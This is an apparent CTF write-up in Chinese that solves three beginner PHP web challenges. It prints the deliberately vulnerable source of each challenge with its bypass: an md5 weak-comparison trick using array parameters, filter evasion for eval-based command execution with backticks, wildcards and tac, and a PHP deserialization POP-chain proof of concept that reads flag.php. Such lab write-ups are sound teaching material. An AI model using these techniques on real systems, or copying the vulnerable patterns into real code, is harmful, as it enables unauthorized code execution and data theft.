web業餘憨憨簡單復現一下,不過有兩題環境掛了
s1mple_php
題目
easy
我的解答:
原始碼:
<?php
highlight_file(__FILE__);
include("flag.php");
$c = $_POST['c'];
$v = $_GET['v'];
$e = $_GET['e'];
if(isset($_GET['v']) and isset($_GET['e'])){
if ($_GET['v'] != $_GET['e']){
if ((md5($_GET['v']) == md5($_GET['e']))){
if(isset($_POST['c'])){
echo $flag;
}else{
die('no!!!');
}
}else{
die('wrong!');
}
}else{
die('wrong wrong !!');
}
}else{
die('wrong wrong wrong!!!');
}
?>
wrong wrong wrong!!!簡單的md5弱比較繞過,保證v和e值不同但md5值相同。可以用陣列繞過:v[]=123&e[]=456
c就隨便了。傳個值就行。
秒了
題目
你會RCE嗎?
我的解答:
原始碼:
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
$c = $_POST['c'];
$c = str_replace("("," ",$c);
$c = str_replace("."," ",$c);
$c = str_replace("cat"," ",$c);
eval($c);
?>分析可知它遮蔽了"(" "."和"cat",我們可以使用反引號 ` 萬用字元 * 以及 tac繞過。
fxlh
題目
你會造鏈子嗎?
我的解答:
原始碼:
<?php
highlight_file(__FILE__);
class zzz
{
public $z;
function __construct($z)
{
$this->z = $z;
}
function __destruct()
{
$this->z->pdf();
}
}
class hhh
{
public $h;
function __call($onename,$val)
{
echo $this->h->docx;
}
}
class ccc
{
public $c;
function __construct($c)
{
$this->c = $c;
}
function __get($Attribute)
{
eval($this->c);
}
}
$p = $_GET['p'];
if(isset($p) and !preg_match('/system/i',$p)) {
unserialize($_GET['p']);
}else{
die('no system!!!');
}
?>
no system!!!首先找到鏈尾,去找滿足出觸發_get方法的條件,這裡在hhh類裡利用h變數可以觸發
再去找觸發_call方法的條件,這裡在zzz類裡利用_destruct()方法可以觸發
構造POC如下:
<?php
class zzz
{
public $z;
function __destruct()
{
$this->z->pdf();
}
}
class hhh
{
public $h;
}
class ccc
{
public $c = "echo `cat flag.php`;";
}
$en = new zzz();
$s = new hhh();
$e = new ccc();
$en -> z = $s;
$s -> h = $e;
echo serialize($en);
?>